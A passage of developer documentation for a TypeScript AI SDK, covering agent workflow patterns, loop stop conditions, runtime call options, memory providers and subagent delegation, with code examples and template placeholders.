    { ...maintainabilityReview.output, type: 'maintainability' },
  ];

  // Aggregate results using another model instance
  const { text: summary } = await generateText({
    model,
    system: 'You are a technical lead summarizing multiple code reviews.',
    prompt: `Synthesize these code review results into a concise summary with key actions:
    ${JSON.stringify(reviews, null, 2)}`,
  });

  return { reviews, summary };
}

Orchestrator-Worker

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function implementFeature(featureRequest: string) {
  // Orchestrator: Plan the implementation
  const { output: implementationPlan } = await generateText({
    model: __MODEL__,
    output: Output.object({
      schema: z.object({
        files: z.array(
          z.object({
            purpose: z.string(),
            filePath: z.string(),
            changeType: z.enum(['create', 'modify', 'delete']),
          }),
        ),
        estimatedComplexity: z.enum(['low', 'medium', 'high']),
      }),
    }),
    system:
      'You are a senior software architect planning feature implementations.',
    prompt: `Analyze this feature request and create an implementation plan:
    ${featureRequest}`,
  });

  // Workers: Execute the planned changes
  const fileChanges = await Promise.all(
    implementationPlan.files.map(async file => {
      // Each worker is specialized for the type of change
      const workerSystemPrompt = {
        create:
          'You are an expert at implementing new files following best practices and project patterns.',
        modify:
          'You are an expert at modifying existing code while maintaining consistency and avoiding regressions.',
        delete:
          'You are an expert at safely removing code while ensuring no breaking changes.',
      }[file.changeType];

      const { output: change } = await generateText({
        model: __MODEL__,
        output: Output.object({
          schema: z.object({
            explanation: z.string(),
            code: z.string(),
          }),
        }),
        system: workerSystemPrompt,
        prompt: `Implement the changes for ${file.filePath} to support:
        ${file.purpose}

        Consider the overall feature context:
        ${featureRequest}`,
      });

      return {
        file,
        implementation: change,
      };
    }),
  );

  return {
    plan: implementationPlan,
    changes: fileChanges,
  };
}

Evaluator-Optimizer

import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function translateWithFeedback(text: string, targetLanguage: string) {
  let currentTranslation = '';
  let iterations = 0;
  const MAX_ITERATIONS = 3;

  // Initial translation
  const { text: translation } = await generateText({
    model: __MODEL__,
    system: 'You are an expert literary translator.',
    prompt: `Translate this text to ${targetLanguage}, preserving tone and cultural nuances:
    ${text}`,
  });

  currentTranslation = translation;

  // Evaluation-optimization loop
  while (iterations < MAX_ITERATIONS) {
    // Evaluate current translation
    const { output: evaluation } = await generateText({
      model: __MODEL__,
      output: Output.object({
        schema: z.object({
          qualityScore: z.number().min(1).max(10),
          preservesTone: z.boolean(),
          preservesNuance: z.boolean(),
          culturallyAccurate: z.boolean(),
          specificIssues: z.array(z.string()),
          improvementSuggestions: z.array(z.string()),
        }),
      }),
      system: 'You are an expert in evaluating literary translations.',
      prompt: `Evaluate this translation:

      Original: ${text}
      Translation: ${currentTranslation}

      Consider:
      1. Overall quality
      2. Preservation of tone
      3. Preservation of nuance
      4. Cultural accuracy`,
    });

    // Check if quality meets threshold
    if (
      evaluation.qualityScore >= 8 &&
      evaluation.preservesTone &&
      evaluation.preservesNuance &&
      evaluation.culturallyAccurate
    ) {
      break;
    }

    // Generate improved translation based on feedback
    const { text: improvedTranslation } = await generateText({
      model: __MODEL__,
      system: 'You are an expert literary translator.',
      prompt: `Improve this translation based on the following feedback:
      ${evaluation.specificIssues.join('\n')}
      ${evaluation.improvementSuggestions.join('\n')}

      Original: ${text}
      Current Translation: ${currentTranslation}`,
    });

    currentTranslation = improvedTranslation;
    iterations++;
  }

  return {
    finalTranslation: currentTranslation,
    iterationsRequired: iterations,
  };
}

title: Loop Control description: Control agent execution with built-in loop management using stopWhen and prepareStep

Loop Control

You can control both the execution flow and the settings at each step of the agent loop. The loop continues until:

A finish reasoning other than tool-calls is returned, or
A tool that is invoked does not have an execute function, or
A tool call needs approval, or
A stop condition is met

The AI SDK provides built-in loop control through two parameters: stopWhen for defining stopping conditions and prepareStep for modifying settings (model, tools, messages, and more) between steps.

Stop Conditions

The stopWhen parameter controls when to stop execution when there are tool results in the last step. By default, agents stop after 20 steps using stepCountIs(20). This default is a safety measure to prevent runaway loops that could result in excessive API calls and costs.

When you provide stopWhen, the agent continues executing after tool calls until a stopping condition is met. When the condition is an array, execution stops when any of the conditions are met.

Use Built-in Conditions

The AI SDK provides several built-in stopping conditions:

stepCountIs(count) — stops after a specified number of steps
hasToolCall(toolName) — stops when a specific tool is called
isLoopFinished() — never triggers, letting the loop run until the agent is naturally finished

Run Up to a Maximum Number of Steps

import { ToolLoopAgent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: stepCountIs(50), // Increasing the default of 20 to 50.
});

const result = await agent.generate({
  prompt: 'Analyze this dataset and create a summary report',
});

Run Until Finished

If you want the agent to run until the model naturally stops making tool calls, use isLoopFinished(). This removes the default step limit:

import { ToolLoopAgent, isLoopFinished } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: isLoopFinished(), // No maximum step limit.
});

const result = await agent.generate({
  prompt: 'Analyze this dataset and create a summary report',
});

Combine Multiple Conditions

Combine multiple stopping conditions. The loop stops when it meets any condition:

import { ToolLoopAgent, stepCountIs, hasToolCall } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  stopWhen: [
    stepCountIs(20), // Maximum 20 steps
    hasToolCall('someTool'), // Stop after calling 'someTool'
  ],
});

const result = await agent.generate({
  prompt: 'Research and analyze the topic',
});

Create Custom Conditions

Build custom stopping conditions for specific requirements:

import { ToolLoopAgent, StopCondition, ToolSet } from 'ai';
__PROVIDER_IMPORT__;

const tools = {
  // your tools
} satisfies ToolSet;

const hasAnswer: StopCondition<typeof tools> = ({ steps }) => {
  // Stop when the model generates text containing "ANSWER:"
  return steps.some(step => step.text?.includes('ANSWER:')) ?? false;
};

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools,
  stopWhen: hasAnswer,
});

const result = await agent.generate({
  prompt: 'Find the answer and respond with "ANSWER: [your answer]"',
});

Custom conditions receive step information across all steps:

const budgetExceeded: StopCondition<typeof tools> = ({ steps }) => {
  const totalUsage = steps.reduce(
    (acc, step) => ({
      inputTokens: acc.inputTokens + (step.usage?.inputTokens ?? 0),
      outputTokens: acc.outputTokens + (step.usage?.outputTokens ?? 0),
    }),
    { inputTokens: 0, outputTokens: 0 },
  );

  const costEstimate =
    (totalUsage.inputTokens * 0.01 + totalUsage.outputTokens * 0.03) / 1000;
  return costEstimate > 0.5; // Stop if cost exceeds $0.50
};

Prepare Step

Dynamic Model Selection

Switch models based on step requirements:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: 'openai/gpt-4o-mini', // Default model
  tools: {
    // your tools
  },
  prepareStep: async ({ stepNumber, messages }) => {
    // Use a stronger model for complex reasoning after initial steps
    if (stepNumber > 2 && messages.length > 10) {
      return {
        model: __MODEL__,
      };
    }
    // Continue with default settings
    return {};
  },
});

const result = await agent.generate({
  prompt: '...',
});

Context Management

Manage growing conversation history in long-running loops:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  prepareStep: async ({ messages }) => {
    // Keep only recent messages to stay within context limits
    if (messages.length > 20) {
      return {
        messages: [
          messages[0], // Keep system instructions
          ...messages.slice(-10), // Keep last 10 messages
        ],
      };
    }
    return {};
  },
});

const result = await agent.generate({
  prompt: '...',
});

Tool Selection

Control which tools are available at each step:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    search: searchTool,
    analyze: analyzeTool,
    summarize: summarizeTool,
  },
  prepareStep: async ({ stepNumber, steps }) => {
    // Search phase (steps 0-2)
    if (stepNumber <= 2) {
      return {
        activeTools: ['search'],
        toolChoice: 'required',
      };
    }

    // Analysis phase (steps 3-5)
    if (stepNumber <= 5) {
      return {
        activeTools: ['analyze'],
      };
    }

    // Summary phase (step 6+)
    return {
      activeTools: ['summarize'],
      toolChoice: 'required',
    };
  },
});

const result = await agent.generate({
  prompt: '...',
});

You can also force a specific tool to be used:

prepareStep: async ({ stepNumber }) => {
  if (stepNumber === 0) {
    // Force the search tool to be used first
    return {
      toolChoice: { type: 'tool', toolName: 'search' },
    };
  }

  if (stepNumber === 5) {
    // Force the summarize tool after analysis
    return {
      toolChoice: { type: 'tool', toolName: 'summarize' },
    };
  }

  return {};
};

Message Modification

Transform messages before sending them to the model:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    // your tools
  },
  prepareStep: async ({ messages, stepNumber }) => {
    // Summarize tool results to reduce token usage
    const processedMessages = messages.map(msg => {
      if (msg.role === 'tool' && msg.content.length > 1000) {
        return {
          ...msg,
          content: summarizeToolResult(msg.content),
        };
      }
      return msg;
    });

    return { messages: processedMessages };
  },
});

const result = await agent.generate({
  prompt: '...',
});

Access Step Information

Both stopWhen and prepareStep receive detailed information about the current execution:

prepareStep: async ({
  model, // Current model configuration
  stepNumber, // Current step number (0-indexed)
  steps, // All previous steps with their results
  messages, // Messages to be sent to the model
}) => {
  // Access previous tool calls and results
  const previousToolCalls = steps.flatMap(step => step.toolCalls);
  const previousResults = steps.flatMap(step => step.toolResults);

  // Make decisions based on execution history
  if (previousToolCalls.some(call => call.toolName === 'dataAnalysis')) {
    return {
      toolChoice: { type: 'tool', toolName: 'reportGenerator' },
    };
  }

  return {};
},

Forced Tool Calling

You can force the agent to always use tools by combining toolChoice: 'required' with a done tool that has no execute function. This pattern ensures the agent uses tools for every step and stops only when it explicitly signals completion.

import { ToolLoopAgent, tool } from 'ai';
import { z } from 'zod';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: {
    search: searchTool,
    analyze: analyzeTool,
    done: tool({
      description: 'Signal that you have finished your work',
      inputSchema: z.object({
        answer: z.string().describe('The final answer'),
      }),
      // No execute function - stops the agent when called
    }),
  },
  toolChoice: 'required', // Force tool calls at every step
});

const result = await agent.generate({
  prompt: 'Research and analyze this topic, then provide your answer.',
});

// extract answer from done tool call
const toolCall = result.staticToolCalls[0]; // tool call from final step
if (toolCall?.toolName === 'done') {
  console.log(toolCall.input.answer);
}

Key aspects of this pattern:

toolChoice: 'required': Forces the model to call a tool at every step instead of generating text directly. This ensures the agent follows a structured workflow.
done tool without execute: A tool that has no execute function acts as a termination signal. When the agent calls this tool, the loop stops because there's no function to execute.
Accessing results: The final answer is available in result.staticToolCalls, which contains tool calls that weren't executed.

This pattern is useful when you want the agent to always use specific tools for operations (like code execution or data retrieval) rather than attempting to answer directly.

Manual Loop Control

Implementing a Manual Loop

Build your own agent loop when you need full control over execution:

import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;

const messages: ModelMessage[] = [{ role: 'user', content: '...' }];

let step = 0;
const maxSteps = 10;

while (step < maxSteps) {
  const result = await generateText({
    model: __MODEL__,
    messages,
    tools: {
      // your tools here
    },
  });

  messages.push(...result.response.messages);

  if (result.text) {
    break; // Stop when model generates text
  }

  step++;
}

This manual approach gives you complete control over:

Message history management
Step-by-step decision making
Custom stopping conditions
Dynamic tool and model selection
Error handling and recovery

Learn more about manual agent loops in the cookbook.

title: Configuring Call Options description: Pass type-safe runtime inputs to dynamically configure agent behavior.

Configuring Call Options

Call options allow you to pass type-safe structured inputs to your agent. Use them to dynamically modify any agent setting based on the specific request.

Why Use Call Options?

When you need agent behavior to change based on runtime context:

Add dynamic context - Inject retrieved documents, user preferences, or session data into prompts
Select models dynamically - Choose faster or more capable models based on request complexity
Configure tools per request - Pass user location to search tools or adjust tool behavior
Customize provider options - Set reasoning effort, temperature, or other provider-specific settings

Without call options, you'd need to create multiple agents or handle configuration logic outside the agent.

How It Works

Define call options in three steps:

Define the schema - Specify what inputs you accept using callOptionsSchema
Configure with prepareCall - Use those inputs to modify agent settings
Pass options at runtime - Provide the options when calling generate() or stream()

Basic Example

Add user context to your agent's prompt at runtime:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const supportAgent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    userId: z.string(),
    accountType: z.enum(['free', 'pro', 'enterprise']),
  }),
  instructions: 'You are a helpful customer support agent.',
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    instructions:
      settings.instructions +
      `\nUser context:
- Account type: ${options.accountType}
- User ID: ${options.userId}

Adjust your response based on the user's account level.`,
  }),
});

// Call the agent with specific user context
const result = await supportAgent.generate({
  prompt: 'How do I upgrade my account?',
  options: {
    userId: 'user_123',
    accountType: 'free',
  },
});

The options parameter is now required and type-checked. If you don't provide it or pass incorrect types, TypeScript will error.

Modifying Agent Settings

Use prepareCall to modify any agent setting. Return only the settings you want to change.

Dynamic Model Selection

Choose models based on request characteristics:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const agent = new ToolLoopAgent({
  model: __MODEL__, // Default model
  callOptionsSchema: z.object({
    complexity: z.enum(['simple', 'complex']),
  }),
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    model:
      options.complexity === 'simple' ? 'openai/gpt-4o-mini' : 'openai/o1-mini',
  }),
});

// Use faster model for simple queries
await agent.generate({
  prompt: 'What is 2+2?',
  options: { complexity: 'simple' },
});

// Use more capable model for complex reasoning
await agent.generate({
  prompt: 'Explain quantum entanglement',
  options: { complexity: 'complex' },
});

Dynamic Tool Configuration

Configure tools based on runtime context:

import { openai } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const newsAgent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    userCity: z.string().optional(),
    userRegion: z.string().optional(),
  }),
  tools: {
    web_search: openai.tools.webSearch(),
  },
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    tools: {
      web_search: openai.tools.webSearch({
        searchContextSize: 'low',
        userLocation: {
          type: 'approximate',
          city: options.userCity,
          region: options.userRegion,
          country: 'US',
        },
      }),
    },
  }),
});

await newsAgent.generate({
  prompt: 'What are the top local news stories?',
  options: {
    userCity: 'San Francisco',
    userRegion: 'California',
  },
});

Provider-Specific Options

Configure provider settings dynamically:

import { OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
import { z } from 'zod';

const agent = new ToolLoopAgent({
  model: 'openai/o3',
  callOptionsSchema: z.object({
    taskDifficulty: z.enum(['low', 'medium', 'high']),
  }),
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    providerOptions: {
      openai: {
        reasoningEffort: options.taskDifficulty,
      } satisfies OpenAILanguageModelResponsesOptions,
    },
  }),
});

await agent.generate({
  prompt: 'Analyze this complex scenario...',
  options: { taskDifficulty: 'high' },
});

Advanced Patterns

Retrieval Augmented Generation (RAG)

Fetch relevant context and inject it into your prompt:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const ragAgent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    query: z.string(),
  }),
  prepareCall: async ({ options, ...settings }) => {
    // Fetch relevant documents (this can be async)
    const documents = await vectorSearch(options.query);

    return {
      ...settings,
      instructions: `Answer questions using the following context:

${documents.map(doc => doc.content).join('\n\n')}`,
    };
  },
});

await ragAgent.generate({
  prompt: 'What is our refund policy?',
  options: { query: 'refund policy' },
});

The prepareCall function can be async, enabling you to fetch data before configuring the agent.

Combining Multiple Modifications

Modify multiple settings together:

import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

const agent = new ToolLoopAgent({
  model: __MODEL__,
  callOptionsSchema: z.object({
    userRole: z.enum(['admin', 'user']),
    urgency: z.enum(['low', 'high']),
  }),
  tools: {
    readDatabase: readDatabaseTool,
    writeDatabase: writeDatabaseTool,
  },
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    // Upgrade model for urgent requests
    model: options.urgency === 'high' ? __MODEL__ : settings.model,
    // Limit tools based on user role
    activeTools:
      options.userRole === 'admin'
        ? ['readDatabase', 'writeDatabase']
        : ['readDatabase'],
    // Adjust instructions
    instructions: `You are a ${options.userRole} assistant.
${options.userRole === 'admin' ? 'You have full database access.' : 'You have read-only access.'}`,
  }),
});

await agent.generate({
  prompt: 'Update the user record',
  options: {
    userRole: 'admin',
    urgency: 'high',
  },
});

Using with createAgentUIStreamResponse

Pass call options through API routes to your agent:

import { createAgentUIStreamResponse } from 'ai';
import { myAgent } from '@/ai/agents/my-agent';

export async function POST(request: Request) {
  const { messages, userId, accountType } = await request.json();

  return createAgentUIStreamResponse({
    agent: myAgent,
    messages,
    options: {
      userId,
      accountType,
    },
  });
}

Next Steps

Learn about loop control for execution management
Explore workflow patterns for complex multi-step processes

title: Memory description: Add persistent memory to your agent using provider-defined tools, memory providers, or a custom tool.

Memory

Memory lets your agent save information and recall it later. Without memory, every conversation starts fresh. With memory, your agent builds context over time, recalls previous interactions, and adapts to the user.

Three Approaches

You can add memory to your agent with the AI SDK in three ways, each with different tradeoffs:

Approach	Effort	Flexibility	Provider Lock-in
Provider-Defined Tools	Low	Medium	Yes
Memory Providers	Low	Low	Depends on memory provider
Custom Tool	High	High	No

Provider-Defined Tools

Provider-defined tools are tools where the provider specifies the tool's inputSchema and description, but you provide the execute function. The model has been trained to use these tools, which can result in better performance compared to custom tools.

Anthropic Memory Tool

The Anthropic Memory Tool gives Claude a structured interface for managing a /memories directory. Claude reads its memory before starting tasks, creates and updates files as it works, and references them in future conversations.

import { anthropic } from '@ai-sdk/anthropic';
import { ToolLoopAgent } from 'ai';

const memory = anthropic.tools.memory_20250818({
  execute: async action => {
    // `action` contains `command`, `path`, and other fields
    // depending on the command (view, create, str_replace,
    // insert, delete, rename).
    // Implement your storage backend here.
    // Return the result as a string.
  },
});

const agent = new ToolLoopAgent({
  model: 'anthropic/claude-haiku-4.5',
  tools: { memory },
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

The tool receives structured commands (view, create, str_replace, insert, delete, rename), each with a path scoped to /memories. Your execute function maps these to your storage backend (the filesystem, a database, or any other persistence layer).

When to use this: you want memory with minimal implementation effort and are already using Anthropic models. The tradeoff is provider lock-in, since this tool only works with Claude.

Memory Providers

Another approach is to use a provider that has memory built in. These providers wrap an external memory service and expose it through the AI SDK's standard interface. Memory storage, retrieval, and injection happen transparently, and you do not define any tools yourself.

Letta

Letta provides agents with persistent long-term memory. You create an agent on Letta's platform (cloud or self-hosted), configure its memory there, and use the AI SDK provider to interact with it. Letta's agent runtime handles memory management (core memory, archival memory, recall).

pnpm add @letta-ai/vercel-ai-sdk-provider

import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';

const agent = new ToolLoopAgent({
  model: lettaCloud(),
  providerOptions: {
    letta: {
      agent: { id: 'your-agent-id' },
    },
  },
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

You can also use Letta's built-in memory tools alongside custom tools:

import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';

const agent = new ToolLoopAgent({
  model: lettaCloud(),
  tools: {
    core_memory_append: lettaCloud.tool('core_memory_append'),
    memory_insert: lettaCloud.tool('memory_insert'),
    memory_replace: lettaCloud.tool('memory_replace'),
  },
  providerOptions: {
    letta: {
      agent: { id: 'your-agent-id' },
    },
  },
});

const stream = agent.stream({
  prompt: 'What do you remember about me?',
});

See the Letta provider documentation for full setup and configuration.

Mem0

Mem0 adds a memory layer on top of any supported LLM provider. It automatically extracts memories from conversations, stores them, and retrieves relevant ones for future prompts.

pnpm add @mem0/vercel-ai-provider

import { createMem0 } from '@mem0/vercel-ai-provider';
import { ToolLoopAgent } from 'ai';

const mem0 = createMem0({
  provider: 'openai',
  mem0ApiKey: process.env.MEM0_API_KEY,
  apiKey: process.env.OPENAI_API_KEY,
});

const agent = new ToolLoopAgent({
  model: mem0('gpt-4.1', { user_id: 'user-123' }),
});

const { text } = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

Mem0 works across multiple LLM providers (OpenAI, Anthropic, Google, Groq, Cohere). You can also manage memories explicitly:

import { addMemories, retrieveMemories } from '@mem0/vercel-ai-provider';

await addMemories(messages, { user_id: 'user-123' });
const context = await retrieveMemories(prompt, { user_id: 'user-123' });

See the Mem0 provider documentation for full setup and configuration.

Supermemory

Supermemory is a long-term memory platform that adds persistent, self-growing memory to your AI applications. It provides tools that handle saving and retrieving memories automatically through semantic search.

pnpm add @supermemory/tools

__PROVIDER_IMPORT__;
import { supermemoryTools } from '@supermemory/tools/ai-sdk';
import { ToolLoopAgent } from 'ai';

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: supermemoryTools(process.env.SUPERMEMORY_API_KEY!),
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

Supermemory works with any AI SDK provider. The tools give the model addMemory and searchMemories operations that handle storage and retrieval.

See the Supermemory provider documentation for full setup and configuration.

Hindsight

Hindsight provides agents with persistent memory through five tools: retain, recall, reflect, getMentalModel, and getDocument. It can be self-hosted with Docker or used as a cloud service.

pnpm add @vectorize-io/hindsight-ai-sdk @vectorize-io/hindsight-client

__PROVIDER_IMPORT__;
import { HindsightClient } from '@vectorize-io/hindsight-client';
import { createHindsightTools } from '@vectorize-io/hindsight-ai-sdk';
import { ToolLoopAgent } from 'ai';
import { openai } from '@ai-sdk/openai';

const client = new HindsightClient({ baseUrl: process.env.HINDSIGHT_API_URL });

const agent = new ToolLoopAgent({
  model: __MODEL__,
  tools: createHindsightTools({ client, bankId: 'user-123' }),
  instructions: 'You are a helpful assistant with long-term memory.',
});

const result = await agent.generate({
  prompt: 'Remember that my favorite editor is Neovim',
});

The bankId identifies the memory store and is typically a user ID. In multi-user apps, call createHindsightTools inside your request handler so each request gets the right bank. Hindsight works with any AI SDK provider.

See the Hindsight provider documentation for full setup and configuration.

When to use memory providers: these providers are a good fit when you want memory without building any storage infrastructure. The tradeoff is that the provider controls memory behavior, so you have less visibility into what gets stored and how it is retrieved. You also take on a dependency on an external service.

Custom Tool

Building your own memory tool from scratch is the most flexible approach. You control the storage format, the interface, and the retrieval logic. This requires the most upfront work but gives you full ownership of how memory works, with no provider lock-in and no external dependencies.

There are two common patterns:

Structured actions: you define explicit operations (view, create, update, search) and handle structured input yourself. Safe by design since you control every operation.
Bash-backed: you give the model a sandboxed bash environment to compose shell commands (cat, grep, sed, echo) for flexible memory access. More powerful but requires command validation for safety.

For a full walkthrough of implementing a custom memory tool with a bash-backed interface, AST-based command validation, and filesystem persistence, see the Build a Custom Memory Tool recipe.

title: Subagents description: Delegate context-heavy tasks to specialized subagents while keeping the main agent focused.

Subagents

A subagent is an agent that a parent agent can invoke. The parent delegates work via a tool, and the subagent executes autonomously before returning a result.

How It Works

Define a subagent with its own model, instructions, and tools
Create a tool that calls it for the main agent to use
Subagent runs independently with its own context window
Return a result (optionally streaming progress to the UI)
Control what the model sees using toModelOutput to summarize

When to Use Subagents

Subagents add latency and complexity. Use them when the benefits outweigh the costs:

Use Subagents When	Avoid Subagents When
Tasks require exploring large amounts of tokens	Tasks are simple and focused
You need to parallelize independent research	Sequential processing suffices
Context would grow beyond model limits	Context stays manageable
You want to isolate tool access by capability	All tools can safely coexist

Why Use Subagents?

Offloading Context-Heavy Tasks

Some tasks require exploring large amounts of information—reading files, searching codebases, or researching topics. Running these in the main agent consumes context quickly, making the agent less coherent over time.

With subagents, you can:

Spin up a dedicated agent that uses hundreds of thousands of tokens
Have it return only a focused summary (perhaps 1,000 tokens)
Keep your main agent's context clean and coherent

The subagent does the heavy lifting while the main agent stays focused on orchestration.

Parallelizing Independent Work

For tasks like exploring a codebase, you can spawn multiple subagents to research different areas simultaneously. Each returns a summary, and the main agent synthesizes the findings—without paying the context cost of all that exploration.

Specialized Orchestration

A less common but valid pattern is using a main agent purely for orchestration, delegating to specialized subagents for different types of work. For example:

An exploration subagent with read-only tools for researching codebases
A coding subagent with file editing tools
An integration subagent with tools for a specific platform or API

This creates a clear separation of concerns, though context offloading and parallelization are the more common motivations for subagents.

Basic Subagent Without Streaming

The simplest subagent pattern requires no special machinery. Your main agent has a tool that calls another agent in its execute function:

import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

// Define a subagent for research tasks
const researchSubagent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a research agent.
Summarize your findings in your final response.`,
  tools: {
    read: readFileTool, // defined elsewhere
    search: searchTool, // defined elsewhere
  },
});

// Create a tool that delegates to the subagent
const researchTool = tool({
  description: 'Research a topic or question in depth.',
  inputSchema: z.object({
    task: z.string().describe('The research task to complete'),
  }),
  execute: async ({ task }, { abortSignal }) => {
    const result = await researchSubagent.generate({
      prompt: task,
      abortSignal,
    });
    return result.text;
  },
});

// Main agent uses the research tool
const mainAgent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant that can delegate research tasks.',
  tools: {
    research: researchTool,
  },
});

This works well when you don't need to show the subagent's progress in the UI. The tool call blocks until the subagent completes, then returns the final text response.

Handling Cancellation

When the user cancels a request, the abortSignal propagates to the subagent. Always pass it through to ensure cleanup:

execute: async ({ task }, { abortSignal }) => {
  const result = await researchSubagent.generate({
    prompt: task,
    abortSignal, // Cancels subagent if main request is aborted
  });
  return result.text;
},

If you abort the signal, the subagent stops executing and throws an AbortError. The main agent's tool execution fails, which stops the main loop.

To avoid errors about incomplete tool calls in subsequent messages, use convertToModelMessages with ignoreIncompleteToolCalls:

import { convertToModelMessages } from 'ai';

const modelMessages = await convertToModelMessages(messages, {
  ignoreIncompleteToolCalls: true,
});

This filters out tool calls that don't have corresponding results. Learn more in the convertToModelMessages reference.

Streaming Subagent Progress

When you want to show incremental progress as the subagent works, use preliminary tool results. This pattern uses a generator function that yields partial updates to the UI.

How Preliminary Tool Results Work

Change your execute function from a regular function to an async generator (async function*). Each yield sends a preliminary result to the frontend:

execute: async function* ({ /* input */ }) {
  // ... do work ...
  yield partialResult;
  // ... do more work ...
  yield updatedResult;
}

Building the Complete Message

Each yield replaces the previous output entirely (it does not append). This means you need a way to accumulate the subagent's response into a complete message that grows over time.

The readUIMessageStream utility handles this. It reads each chunk from the stream and builds an ever-growing UIMessage containing all parts received so far:

import { readUIMessageStream, tool } from 'ai';
import { z } from 'zod';

const researchTool = tool({
  description: 'Research a topic or question in depth.',
  inputSchema: z.object({
    task: z.string().describe('The research task to complete'),
  }),
  execute: async function* ({ task }, { abortSignal }) {
    // Start the subagent with streaming
    const result = await researchSubagent.stream({
      prompt: task,
      abortSignal,
    });

    // Each iteration yields a complete, accumulated UIMessage
    for await (const message of readUIMessageStream({
      stream: result.toUIMessageStream(),
    })) {
      yield message;
    }
  },
});

Each yielded message is a complete UIMessage containing all the subagent's parts up to that point (text, tool calls, and tool results). The frontend simply replaces its display with each new message.

Controlling What the Model Sees

Here's where subagents become powerful for context management. The full UIMessage with all the subagent's work is stored in the message history and displayed in the UI. But you can control what the main agent's model actually sees using toModelOutput.

How It Works

The toModelOutput function maps the tool's output to the tokens sent to the model:

const researchTool = tool({
  description: 'Research a topic or question in depth.',
  inputSchema: z.object({
    task: z.string().describe('The research task to complete'),
  }),
  execute: async function* ({ task }, { abortSignal }) {
    const result = await researchSubagent.stream({
      prompt: task,
      abortSignal,
    });

    for await (const message of readUIMessageStream({
      stream: result.toUIMessageStream(),
    })) {
      yield message;
    }
  },
  toModelOutput: ({ output: message }) => {
    // Extract just the final text as a summary
    const lastTextPart = message?.parts.findLast(p => p.type === 'text');
    return {
      type: 'text',
      value: lastTextPart?.text ?? 'Task completed.',
    };
  },
});

With this setup:

Users see: The full subagent execution—every tool call, every intermediate step
The model sees: Just the final summary text

The subagent might use 100,000 tokens exploring and reasoning, but the main agent only consumes the summary. This keeps the main agent coherent and focused.

Write Subagent Instructions for Summarization

For toModelOutput to extract a useful summary, your subagent must produce one. Add explicit instructions like this:

const researchSubagent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: `You are a research agent. Complete the task autonomously.

IMPORTANT: When you have finished, write a clear summary of your findings as your final response.
This summary will be returned to the main agent, so include all relevant information.`,
  tools: {
    read: readFileTool,
    search: searchTool,
  },
});

Without this instruction, the subagent might not produce a comprehensive summary. It could simply say "Done", leaving toModelOutput with nothing useful to extract.

Rendering Subagents in the UI (with useChat)

To display streaming progress, check the tool part's state and preliminary flag.

Tool Part States

State	Description
`input-streaming`	Tool input being generated
`input-available`	Tool ready to execute
`output-available`	Tool produced output (check `preliminary`)
`output-error`	Tool execution failed

Detecting Streaming vs Complete

const hasOutput = part.state === 'output-available';
const isStreaming = hasOutput && part.preliminary === true;
const isComplete = hasOutput && !part.preliminary;

Type Safety for Subagent Output

Export types alongside your agents for use in UI components:

import { ToolLoopAgent, InferAgentUIMessage } from 'ai';

export const mainAgent = new ToolLoopAgent({
  // ... configuration with researchTool
});

// Export the main agent message type for the chat UI
export type MainAgentMessage = InferAgentUIMessage<typeof mainAgent>;

Render Messages and Subagent Output

This example uses the types defined above to render both the main agent's messages and the subagent's streamed output:

'use client';

import { useChat } from '@ai-sdk/react';
import type { MainAgentMessage } from '@/lib/agents';

export function Chat() {
  const { messages } = useChat<MainAgentMessage>();

  return (
    <div>
      {messages.map(message =>
        message.parts.map((part, i) => {
          switch (part.type) {
            case 'text':
              return <p key={i}>{part.text}</p>;
            case 'tool-research':
              return (
                <div>
